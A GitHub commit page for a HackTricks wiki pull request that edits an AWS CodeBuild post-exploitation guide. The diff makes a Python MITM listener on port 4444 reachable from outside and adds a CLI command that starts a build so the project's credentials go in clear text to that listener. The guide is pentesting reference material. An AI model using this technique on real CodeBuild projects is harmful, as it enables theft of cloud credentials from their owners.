Merge pull request #129 from RealFakeAccount/fix-AWS-Codebuild-Token-…

…Leakage-Via-insecureSSL Update aws-codebuild-token-leakage.md
HackTricks-wiki · Dec 26, 2024 · 6439ce9 · 6439ce9
2 parents 91e1798 + 4c240ff
commit 6439ce9
Showing 1 changed file with 8 additions and 2 deletions.
diff --git a/...ost-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/...ost-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -149,7 +149,7 @@ aws codebuild update-project --name <proj-name> \
 from mitm import MITM, protocol, middleware, crypto
 
 mitm = MITM(
-    host="127.0.0.1",
+    host="0.0.0.0",
     port=4444,
     protocols=[protocol.HTTP], 
     middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
@@ -158,7 +158,13 @@ mitm = MITM(
 mitm.run()
 ```
 
-* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+* Next, click on **Build the project** or start the build from command line:
+
+```sh
+aws codebuild start-build --project-name <proj-name>
+```
+
+* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
 
 <figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>